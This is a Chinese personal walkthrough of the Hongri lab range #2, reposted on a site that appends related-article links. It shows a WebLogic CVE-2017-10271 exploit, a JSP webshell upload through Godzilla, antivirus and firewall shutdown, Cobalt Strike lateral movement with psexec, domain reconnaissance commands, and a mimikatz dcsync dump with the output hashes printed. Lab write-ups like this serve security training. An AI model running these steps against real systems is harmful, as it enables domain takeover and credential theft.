红日靶场(二)——个人笔记

news2025/3/20 10:58:36

image.png

靶场搭建

新增VMnet2网卡
image.png
**web:**需要配置两张网卡,分别是外网出访NAT模式和内网域环境仅主机模式下的VMnet2网卡。
image.png

**PC:**跟web一样,也是需要配置两张网卡,分别是外网出访NAT模式和内网域环境仅主机模式下的VMnet2网卡。
image.png
**DC:**只是内网网段,所以只需配置仅主机模式
image.png
靶场的web和pc网关是192.168.111.1,网关设置为192.168.111.2,需要把外网nat网关改为.2。

账号:administrator

密码:1qaz@WSX
image.png
image.png

在web服务器上启动weblogic服务,用管理员权限administrator/1qaz@WSX打开startweblogic。
使用管理员模式依次执行脚本
路径C:\Oracle\Middleware\user_projects\domains\base_domain\bin
image.png

浏览器访问http://192.168.111.80:7001,看到Error 404即启动成功,靶场搭建完成。
Weblogic登录界面:http://192.168.111.80:7001/console

至此,环境搭建完成

外网探测

Oracle WebLogic Server的登录页面
image.png
系统版本:
WebLogic Server 版本: 10.3.6.0

思路:测试弱口令,测试SQL,找历史版本CVE打,抓包分析

弱口令没有成功
尝试sqlmap没有成功

python sqlmap.py -r F:\1.txt -p j_password --dbs

尝试找历史CVE打:weblogic_10.3.6_unserialize _CVE-2017-10271

在这之前,先进行一下简单的目录扫描和端口扫描

nmap -Pn -sT 192.168.111.80
dirsearch -u http://192.168.111.80:7001/

image.png

使用weblogic漏洞扫描工具打CVE

验证存在漏洞
image.png

发现可以任意命令执行,且为administrator用户权限
image.png

思路:
这里我注意到网页的url可以查看图片位置,在这里或许可以尝试上传图片马

image.png

上传shell
image.png
但是并没有上传成功
image.png
查阅后,可以通过上传jsp马拿shell
尝试访问http://192.168.111.80:7001/uddiexplorer/
右上角图片新建窗口打开,复制url

http://192.168.111.80:7001/uddiexplorer/oracle_logo.gif

image.png
复制图片文件名,在weblogic中查找位置:

find / -name "oracle_logo.gif" 

利用失败,windows系统,尝试使用windows命令搜索(我犯病了,自己搭的windows靶机用Linux命令………………)

dir /s /b oracle_logo.gif

找到文件位置:
image.png

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\5f6ebw\war\oracle_logo.gif

尝试在这个路径下上传木马
image.png

显示空白,上传成功!
image.png

尝试远程连接,连接失败,尝试哥斯拉上传jsp木马
生成jsp木马:
image.png
image.png

上传成功,尝试godzilla远程连接
image.png

连接成功!:
image.png

至此,拿到入口机shell

打入内网

已经拿到shell
这里乱码问题没解决,用蚁剑连接(最后还是用哥斯拉上传的jsp木马用蚁剑连接)
image.png

但是无法执行net view ,可能现在拿到的不是域内用户
执行ipconfig /all
可以发现主机有俩张网卡,10.10.10.0/24可能是域内网段
image.png

查看进程,可以发现有360的杀毒软件(这里免杀没学会,直接关掉杀毒软件了……)
image.png

上线CS

这里看到上线的用户为Administrator,并非域内用户。
image.png
尝试用梼杌插件提权

ae614a64356919c925812b7d5c4b6dc.png

提权成功,扫描内网:

ipconfig /all            #查看域,及域内网段
tasklist /svc            #查看进程,检测是否有防火墙
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "domain controllers" /domain  # 查看域控制器主机名(可能有多台)

image.png

域内用户:“Administrator”“de1ay”“Guest”“krbtgt”“mssql”
image.png

这里看到域中除了域控DC还有PC和已经拿到的WEB机器
image.png

查看域控制器
image.png

信息收集:
内网网段:10.10.10.0/24
外网网段:192.168.111.0/24
域控名:DC
内网机器:PC,WEB

探测域控

Fscan:

fscan -h 10.10.10.0/24 -np -nopoc -nobr

探测内网网段:./fscan -h 10.10.10.0/24 -np -nopoc -nobr -p 

image.png

信息收集:
PC:外网ip:192.168.111.201
	内网ip:10.10.10.201
DC:10.10.10.10

DC端口探测:

fscan -h 10.10.10.10 -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379

image.png

信息收集:
DC开放端口:88,135,139,389,445,636,3389,5985

横向移动

拿下域控

SMB Beacon:

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 psexec 或 Stageless Payload 上线

使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。

简略原理:

假设有三个主机 a b c,我们的C2是a且我们已经有了b的权限,b可以访问c,c也可以访问b但不能访问a
这时候我们就可以使用smb beacon 然主机C上线。(前提是有主机C的账号密码)

使用条件:

- 具有 Beacon 的主机必须接受 445 端口上的连接。
- 只能链接由同一个 Cobalt Strike 实例管理的 Beacon。
- 必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。

使用portscan扫描一下内网
image.png

显示targets列表
image.png

新建beacon SMB监听器
image.png

使用psexec上线域控:

46fd163c0066525e084f664b76144c41.png
解释一下我对上面realm的理解:

google:在 Web 安全中,Realm通常指的是一种保护区域,用于区分不同的安全域或资源。
DESKTOP-LANDMRU:独立计算机,不属于任何域,这里应该指PC
WEB:WEB的账户
de1ay.com和de1ay这里我不太清楚,可能是登录域内的机器

image.png

获取ntds.dit文件

在线破解:前提是有管理员权限。

Mimikatz有一个功能(dcsync),它可以利用目录复制服务(Directory Replication Service, DRS)从NTDS.DIT文件中提取密码哈希值。

可以通过dcsync直接获取test域内所有用户hash
lsadump::dcsync /domain:de1ay.com /all /csv

也可以获取单个用户的详细信息  
lsadump::dcsync /domain:de1ay.com /user:kertgt

可以查看所有用户的所有详细信息  
lsadump::lsa /inject
beacon> mimikatz lsadump::dcsync /domain:de1ay.com /all /csv
[*] Tasked beacon to run mimikatz's lsadump::dcsync /domain:de1ay.com /all /csv command
[+] host called home, sent: 813886 bytes
[+] received output:
[DC] 'de1ay.com' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] Exporting domain 'de1ay.com'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	82dfc71b72a11ef37d663047bc2088fb	514
1002	DC$	39d74ac4cdd07a6b0855df6e37b6e815	532480
2103	mssql	161cff084477fe596a5db81874498a24	66048
1001	de1ay	161cff084477fe596a5db81874498a24	66048
1603	WEB$	57e157ab6f45290ad8205651dbd27dcb	4096
1105	PC$	ea6b2055e2f4a1c5fc42058fbfc4b2d5	4096
500	Administrator	161cff084477fe596a5db81874498a24	512

总结与反思:

1.有没有方法做免杀绕过360
2.关于关闭防火墙的命令:

shell netsh advfirewall show all state  		  //查看防火墙状态
shell netsh advfirewall set allprofile state off  //关闭防火墙

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2318326.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

实时视频分析的破局之道:蓝耘 MaaS 如何与海螺 AI 视频实现高效协同

一、蓝耘 MaaS 平台:AI 模型全生命周期管理的智能引擎 蓝耘 MaaS(Model-as-a-Service)平台是由蓝耘科技推出的 AI 模型全生命周期管理平台,专注于为企业和开发者提供从模型训练、推理到部署的一站式解决方案。依托云原生架构、高…

走进Java:String字符串的基本使用

❀❀❀ 大佬求个关注吧~祝您开心每一天 ❀❀❀ 目录 一、什么是String 二、如何定义一个String 1. 用双引号定义 2. 通过构造函数定义 三、String中的一些常用方法 1 字符串比较 1.1 字符串使用 1.2 字符串使用equals() 1.3 使用 equalsIgnoreCase() 1.4 cpmpareTo…

python系列之元组(Tuple)

不为失败找理由,只为成功找方法。所有的不甘,因为还心存梦想,所以在你放弃之前,好好拼一把,只怕心老,不怕路长。 python系列之元组(Turple) 一、元组是什么?——给新手的…

破解验证码新利器:基于百度OCR与captcha-killer-modified插件的免费调用教程

破解验证码新利器:基于百度OCR与captcha-killer-modified插件的免费调用教程 引言 免责声明: 本文提供的信息仅供参考,不承担因操作产生的任何损失。读者需自行判断内容适用性,并遵守法律法规。作者不鼓励非法行为,保…

批量删除 PPT 中的所有图片、某张指定图片或者所有二维码图片

PPT 文档中的图片如何删除呢?相信很多小伙伴或碰到类似的需求。比如我们需要删除 PPT 文档中的某一张图片或者某张二维码图片,如果每一页都有这张图片,或者有很多 ppt 都有同一张要删除的图片,我们应该怎么快速的完成删除呢&#…

大模型开发(六):LoRA项目——新媒体评论智能分类与信息抽取系统

LoRA项目——新媒体评论智能分类与信息抽取系统 0 前言1 项目介绍1.1 项目功能1.2 技术原理1.3 软硬件环境1.4 项目结构 2 数据介绍与处理2.1 数据集介绍2.2 数据处理2.3 数据导入器 3 模型训练3.1 配置文件3.2 工具函数3.3 模型训练3.4 模型评估 4 模型推理 0 前言 微调里面&…

mysql-innodb存储引擎主键索引叶子结点数据结构(非单纯的双向链表)

我们应该清楚行记录是放在页中的。 compact行记录格式: 主要介绍几个比较重要的参数 heap_no: 页号 record_type: 0 表示普通类型(叶子结点),1表示B树的非叶子节点 ,2 表示最小记录&#xff…

物联网为什么用MQTT不用 HTTP 或 UDP?

先来两个代码对比,上传温度数据给服务器。 MQTT代码示例 // MQTT 客户端连接到 MQTT 服务器 mqttClient.connect("mqtt://broker.server.com:8883", clientId) // 订阅特定主题 mqttClient.subscribe("sensor/data", qos1) // …

Vmware中的centos7连接上网

有很多刚刚开始配置了centos7,然后发现不能上网现在来解决这个问题。 测试能不能上网 先还原这个设置,如果没有动过的话就不用,连接模式是NAT模式 然后进去设置网络环境,记得是用超级用户设置 vi /etc/sysconfig/network-script…

【AI知识】常见的优化器及其原理:梯度下降、动量梯度下降、AdaGrad、RMSProp、Adam、AdamW

常见的优化器 梯度下降(Gradient Descent, GD)局部最小值、全局最小值和鞍点凸函数和非凸函数动量梯度下降(Momentum)自适应学习率优化器AdaGrad(Adaptive Gradient Algorithm)​RMSProp(Root M…

线性规划的标准形式

标准形式的定义 目标函数:最大化线性目标函数 其中,x 是决策变量向量,c 是目标系数向量。 约束条件:等式形式约束 A x b, 其中,A 是约束系数矩阵,b 是常数项向量。 变量非负约束: 。 因此…

网络安全应急入门到实战

奇安信:95015网络安全应急响应分析报告(2022-2024年)官网可以下载 https://github.com/Bypass007/Emergency-Response-Notes 应急响应实战笔记 网络安全应急响应技术实战指南 .pdf 常见场景 第4章 勒索病毒网络安全应急响应 第5章 挖矿木…

应用程序安全趋势:左移安全、人工智能和开源恶意软件

软件是大多数行业业务运营的核心,这意味着应用程序安全从未如此重要。 随着组织采用云原生架构、微服务和开源组件,攻击面不断扩大。结果是:攻击者渴望利用的易受攻击和恶意依赖项数量不断增加。 2025 年,安全团队将面临日益复杂…

ospf动态路由

一、为什么使用动态路由 OSPF(open shortest path first开放最短路径优先)是内部网关协议(IGP)的一种,基于链路状态算法(LS)。 OSPF企业级路由协议(RFC2328 OSPFv2),核心重点协议 OSPF共三个版本,OSPFV1主要是实验室…

基于单片机控制的电动汽车双闭环调速系统(论文+源码)

2.1系统方案 在本次设计中,其系统整个框图如下图3.1所示,其主要的核心控制模块由电源供电模块,晶振电路,驱动电路模块,霍尔传感器,按键模块,复位电路,LCD液晶显示及直流电机等组成。…

【病毒分析】伪造微软官网+勒索加密+支付威胁,CTF中勒索病毒解密题目真实还原!

1.背景 该CTF挑战题目完整复现了黑客的攻击链路,攻击者通过伪造钓鱼页面引导受害者下载恶意软件。用户访问伪造的 Microsoft 365 官网后,在点击“Windows Installer (64-bit)”下载选项时,页面会自动跳转至伪造的 GitHub 项目链接&#xff0…

PDF Reader Pro for Mac v4.9.0 PDF编辑/批注/OCR/转换工具 支持M、Intel芯片

PDF Reader Pro 是一款用户必备的集管理、编辑、转换、阅读功能于一体的专业的全能PDF阅读专家。快速、易用、强大,让您出色完成 PDF 工作。 应用介绍 PDF Reader Pro,一款功能齐全且强大的PDF阅读和编辑软件。支持PDF阅读、批注、PDF编辑、PDF格式转换…

PowerShell 美化 增强教程

PowerShell Windows Terminal 美化 & 增强教程 Windows Terminal PowerShell 默认外观和功能较为基础,但通过 Oh My Posh 及其他增强工具,你可以打造一个更美观、更高效的终端环境。本教程提供完整的安装、美化和优化步骤,包括常见问题…

机械革命蛟龙16pro玩游戏闪屏

我查过原因,好像是AMD显卡对游戏用了可变刷新率就出bug了,可能是那个游戏不适合用可变刷新率技术。 解决办法: 1.桌面右键鼠标,出现如下标签,点击AMD Software:Adrenalin Edition 2.选择闪屏的游戏&#x…

实现图片多种处理需求的实用工具

在自媒体创作与日常办公时,图片处理常让人焦头烂额。今天就给大家介绍一款得力帮手——Fotosizer,它能帮你轻松批量处理图片,满足多样化需求。Fotosizer是一款功能强大的图片批量处理软件,无需安装,打开即用&#xff0…